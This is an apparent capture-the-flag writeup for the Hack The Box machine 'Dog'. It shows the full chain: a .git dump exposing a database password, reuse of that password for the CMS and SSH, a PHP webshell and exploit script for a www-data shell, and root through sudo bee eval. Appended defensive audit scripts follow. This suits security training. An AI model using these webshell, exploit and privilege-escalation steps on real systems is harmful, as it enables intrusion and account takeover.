2026/4/18 16:09:23
HTB Dog writeup

Experts, please skip this!

Dog attack points:
1. .git information disclosure
2. Password reuse
3. sudo privilege escalation

Information gathering

nmap

```
└─$ nmap -p- --min-rate 1000 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 11:06 CST
Warning: 10.10.11.58 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.58
Host is up (0.45s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 99.47 seconds
```

```
└─$ nmap -p22,80 -sC -sV --min-rate 1000 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 11:08 CST
Nmap scan report for 10.10.11.58
Host is up (0.44s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases. reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds
```

The target exposes SSH on port 22 and HTTP on port 80. The HTTP service also exposes robots.txt and a .git directory. The operating system is Ubuntu.

Http

The site reveals the domain dog.htb, and the server-side framework is Backdrop CMS. There are login and password-reset pages. Weak-password checks and simple SQL-injection checks against both pages were unsuccessful. Add the domain dog.htb to /etc/hosts. The site served under the domain name is the same as the one served under the IP address.

```
echo "10.10.11.58 dog.htb" | sudo tee -a /etc/hosts
```

.git

Pull the contents of the git repository.

```
└─$ git-dumper http://dog.htb/.git git
[-] Testing http://dog.htb/.git/HEAD [200]
[-] Testing http://dog.htb/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://dog.htb/.git/ [200]
[-] Fetching http://dog.htb/.gitignore [404]
[-] http://dog.htb/.gitignore responded with status code 404
[-] Fetching http://dog.htb/.git/objects/ [200]
...[snip]...
[-] Fetching http://dog.htb/.git/objects/fd/d86ca742a28075b3d04986a74d47766000b6fa [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 2873 paths from the index
```

The branch status shows nothing of value.

```
└─$ git status
On branch master
nothing to commit, working tree clean
```

The commit log contains only the initial commit of the code.

```
└─$ git log
commit 8204779c764abd4c9d8d95038b6d22b6a7515afa (HEAD -> master)
Author: root <dog@dog.htb>
Date:   Fri Feb 7 21:22:11 2025 +0000

    todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
```

Collect any usernames, passwords and version information that may be present in the code.

```
└─$ cat settings.php
<?php
/**
 * @file
 * Main Backdrop CMS configuration file.
 */

/**
 * Database configuration:
 *
 * Most sites can configure their database by entering the connection string
 * below. If using primary/replica databases or multiple connections, see the
 * advanced database documentation at
 * https://api.backdropcms.org/database-configuration
 */
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';
...[snip]...
```

```
└─$ grep -r dog.htb .
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
```

```
└─$ grep -r version . -C3
...[snip]...
./core/profiles/minimal/minimal.info-; Added by Backdrop CMS packaging script on 2024-03-07
./core/profiles/minimal/minimal.info-project = backdrop
./core/profiles/minimal/minimal.info:version = 1.27.1
./core/profiles/minimal/minimal.info-timestamp = 1709862662
...[snip]...
```

This yields the database connection string, with username root and password BackDropJ2024DS2024. Possible Backdrop CMS usernames are dog@dog.htb and tiffany@dog.htb. Logging in to Backdrop CMS with tiffany@dog.htb / BackDropJ2024DS2024 succeeds.

Shell as www-data

backdrop cms 1.27.1 manual

Functionality - Install new modules

Download the tar package used for the exploit: CSRF-to-RCE-on-Backdrop-CMS

```
└─$ tar xvf reference.tar -C reference
reference/views/reference_plugin_display.inc
reference/views/reference_plugin_row_fields.inc
reference/views/reference.views.inc
reference/views/reference_plugin_style.inc
reference/tests/reference.test
reference/tests/reference.admin.test
reference/tests/reference.tests.info
reference/tests/reference.autocomplete.test
reference/shell.php
reference/README.md
reference/reference.module
reference/reference.install
reference/LICENSE.txt
reference/reference.info
reference/views/
reference/tests/
reference/
```

```
└─$ ls -la
total 76
drwx------ 4 VexCjfkNgNW5 VexCjfkNgNW5  4096 Sep 23  2021 .
drwxrwxr-x 3 VexCjfkNgNW5 VexCjfkNgNW5  4096 Sep 23 17:21 ..
-rw-r--r-- 1 VexCjfkNgNW5 VexCjfkNgNW5 18092 Jun 25  2021 LICENSE.txt
-rw-r--r-- 1 VexCjfkNgNW5 VexCjfkNgNW5  1768 Jun 25  2021 README.md
-rw-r--r-- 1 VexCjfkNgNW5 VexCjfkNgNW5   323 Jun 25  2021 reference.info
-rw-r--r-- 1 VexCjfkNgNW5 VexCjfkNgNW5   484 Jun 25  2021 reference.install
-rw-r--r-- 1 VexCjfkNgNW5 VexCjfkNgNW5 23598 Jun 25  2021 reference.module
-rw-r--r-- 1 VexCjfkNgNW5 VexCjfkNgNW5    30 Sep 22  2021 shell.php
drwx------ 2 VexCjfkNgNW5 VexCjfkNgNW5  4096 Sep 23  2021 tests
drwx------ 2 VexCjfkNgNW5 VexCjfkNgNW5  4096 Sep 23  2021 views
```

The one-line webshell, shell.php:

```
└─$ cat shell.php
<?php system($_GET['cmd']);?>
```

Upload reference.tar, choose INSTALL, and the webshell is in place.

backdrop cms 1.27.1 exploit

```
git clone https://github.com/rvizx/backdrop-rce
cd backdrop-rce
```

```
└─$ python exploit.py http://10.10.11.58/ tiffany@dog.htb BackDropJ2024DS2024
[] logging in as user: tiffany@dog.htb
[] login successful
[] enabling maintenance mode
[] maintenance enabled
[] payload archive: /tmp/bd_eny74cc4/rvz2ba58b.tgz
[] fetching installer form
[] uploading payload (bulk empty)
[] initial upload post complete
[] batch id 14; sending authorize ‘do_nojs’ and ‘do’
[] waiting for shell at: http://10.10.11.58/modules/rvz2ba58b/shell.php
[] shell is live
[] interactive shell – type exit to quit
VexCjfkNgNW5@10.10.11.58 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Shell as johncusack

Password reuse: BackDropJ2024DS2024

```
└─$ ssh johncusack@10.10.11.58
johncusack@10.10.11.58's password:
...[snip]...
johncusack@dog:~$ id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)
```

Shell as root

sudo -l

Through /etc/sudoers, an ordinary user can be allowed to run specific commands as the superuser or as another user, using sudo to switch privileges temporarily for that command.

```
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
```

```
johncusack@dog:~$ bee --help
Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
 --root
 Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

 --site
 Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory.

 --base-url
 Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site.

 --yes, -y
 Answer 'yes' to questions without prompting.

 --debug, -d
 Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages).

Commands:
 CONFIGURATION
  config-export
   cex, bcex
   Export config from the site.

  config-get
   cget
   Get the value of a specific config option, or view all the config options in a given file.

  config-import
   cim, bcim
   Import config into the site.

  config-set
   cset
   Set the value of an option in a config file.

 CORE
  download-core
   dl-core
   Download Backdrop core.

  install
   si, site-install
   Install Backdrop and setup a new site.

 DATABASE
  db-drop
   sql-drop
   Drop the current database and recreate an empty database with the same details. This could be used prior to import if the target database has more tables than the source database.

  db-export
   dbex, db-dump, sql-export, sql-dump
   Export the database as a compressed SQL file. This uses the --no-tablespaces option by default.

  db-import
   dbim, sql-import
   Import an SQL file into the current database.

 INFORMATION
  help
   Provide help and examples for 'bee' and its commands.

  log
   ws, dblog, watchdog-show
   Show database log messages.

  status
   st, info, core-status
   Provides an overview of the current Backdrop installation/site.

  version
   Display the current version of Bee.

 MISCELLANEOUS
  cache-clear
   cc
   Clear a specific cache, or all Backdrop caches.

  cron
   Run cron.

  maintenance-mode
   mm
   Enable or disable maintenance mode for Backdrop.

 PROJECTS
  disable
   dis, pm-disable
   Disable one or more projects (modules, themes, layouts).

  download
   dl, pm-download
   Download Backdrop contrib projects.

  enable
   en, pm-enable
   Enable one or more projects (modules, themes, layouts).

  projects
   pml, pmi, project, pm-list, pm-info
   Display information about available projects (modules, themes, layouts).

  uninstall
   pmu, pm-uninstall
   Uninstall one or more modules.

 ROLES
  permissions
   pls, permissions-list
   List all permissons of the modules.

  role-add-perm
   rap
   Grant specified permission(s) to a role.

  role-create
   rcrt
   Add a role.

  role-delete
   rdel
   Delete a role.

  role-remove-perm
   rrp
   Remove specified permission(s) from a role.

  roles
   rls, roles-list
   List all roles with the permissions.

 STATE
  state-get
   sg, sget
   Get the value of a Backdrop state.

  state-set
   ss, sset
   Set the value of an existing Backdrop state.

 THEMES
  theme-admin
   admin-theme
   Set the admin theme.

  theme-default
   default-theme
   Set the default theme.

 UPDATE
  update-db
   updb, updbst, updatedb, updatedb-status
   Show, and optionally apply, all pending database updates.

 USERS
  user-add-role
   urole, urol
   Add role to user.

  user-block
   ublk
   Block a user.

  user-cancel
   ucan
   Cancel/remove a user.

  user-create
   ucrt
   Create a user account with the specified name.

  user-login
   uli
   Display a login link for a given user.

  user-password
   upw, upwd
   Reset the login password for a given user.

  user-remove-role
   urrole, urrol
   Remove a role from a user.

  user-unblock
   uublk
   Unblock a user.

  users
   uls, user-list
   List all user accounts.

 ADVANCED
  db-query
   dbq
   Execute a query using db_query().

  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.
```

```
johncusack@dog:/var/www/html$ sudo bee eval "system('id')"
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:/var/www/html$ sudo bee eval "system('bash')"
root@dog:/var/www/html# exit
exit
```

ippsec obtained the password by brute forcing it; interested readers can practise that approach.

References: Backdrop scan (GitHub); search keywords for the password brute-force bypass.
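The first weakness above (a .git directory and a settings.php connection string reachable under the document root) can be checked for on a server you operate before it is deployed. The following is an added example, not code from the original writeup; `audit_webroot`, `build_sample_tree` and the placeholder password are this example's own assumptions, and the sample tree is constructed.

```python
import os
import re
import tempfile

# scheme://user:password@host, the form settings.php uses for $database above
DSN_WITH_PASSWORD = re.compile(
    r"\b[a-z][a-z0-9+.-]*://[^\s:/@'\"]+:[^\s@/'\"]+@[^\s/'\"]+")
VCS_DIRS = {".git", ".svn", ".hg"}


def audit_webroot(docroot):
    """Return sorted (kind, relative_path) findings for a deployed document root."""
    findings = []
    for current, dirs, files in os.walk(docroot):
        for d in list(dirs):
            if d in VCS_DIRS:
                rel = os.path.relpath(os.path.join(current, d), docroot)
                findings.append(("vcs-metadata", rel))
                dirs.remove(d)  # do not descend into the object store
        for name in files:
            path = os.path.join(current, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read(1_000_000)
            except OSError:
                continue
            if DSN_WITH_PASSWORD.search(text):
                findings.append(("credential-in-file", os.path.relpath(path, docroot)))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed sample: a docroot laid out like the one in the writeup."""
    os.makedirs(os.path.join(base, ".git", "objects"))
    with open(os.path.join(base, ".git", "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(base, "settings.php"), "w") as fh:
        fh.write("<?php\n$database = 'mysql://root:EXAMPLE-PASSWORD@127.0.0.1/backdrop';\n")
    with open(os.path.join(base, "index.php"), "w") as fh:
        fh.write("<?php // no secrets here\n")
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for kind, path in audit_webroot(build_sample_tree(tmp)):
            print(f"{kind:20} {path}")
```

A `vcs-metadata` finding means the deployment copied repository metadata into the served tree; a `credential-in-file` finding marks a secret that should be rotated and must never double as a login password.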
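The sudo rule above grants `bee` with no argument restriction, so every subcommand in its help text, including `eval`, runs as root. As an added example (not part of the original writeup), this check reads `sudo -l` output and flags such rules; `audit_sudo_rules` and the `CODE_EXEC` mapping are this example's assumptions, and every sample rule except the first is constructed.

```python
import re

# Subcommands that execute caller-supplied PHP or SQL, copied from the bee help
# output in the writeup. The mapping itself is this example's assumption.
CODE_EXEC = {"bee": {"eval", "ev", "php-eval", "php-script", "scr",
                     "sql", "sqlc", "sql-cli", "db-cli", "db-query", "dbq"}}
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:[A-Z_]+:\s*)*(?P<cmds>.+)$")

# Constructed sample: the first rule is the one shown above, the rest are invented.
SAMPLE = """\
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (ALL) NOPASSWD: /usr/local/bin/bee cache-clear all, /usr/bin/systemctl status apache2
    (root) /usr/local/bin/bee --root=/var/www/html php-script *
    (www-data) /usr/local/bin/bee eval *
"""


def audit_sudo_rules(sudo_l_output):
    """Return (rule, reason) for root-capable rules that reach a code-exec subcommand."""
    findings, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = RULE.match(line) if in_rules else None
        if not match:
            continue
        users = {u.strip() for u in match.group("runas").split(":")[0].split(",")}
        if not users & {"ALL", "root"}:
            continue  # rule cannot run the command as root
        # Simplification: sudoers can escape commas inside arguments; not handled here.
        for cmd in (c.strip() for c in match.group("cmds").split(",")):
            parts = cmd.split()
            risky = CODE_EXEC.get(parts[0].rsplit("/", 1)[-1]) if parts else None
            if risky is None:
                continue
            args = parts[1:]
            allowed = sorted(a for a in args if a in risky)
            if not args or args[0] == "*":
                findings.append((cmd, "no argument restriction: every subcommand is allowed"))
            elif allowed:
                findings.append((cmd, "allows " + ", ".join(allowed)))
    return findings


if __name__ == "__main__":
    for rule, reason in audit_sudo_rules(SAMPLE):
        print(f"{rule}: {reason}")
```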
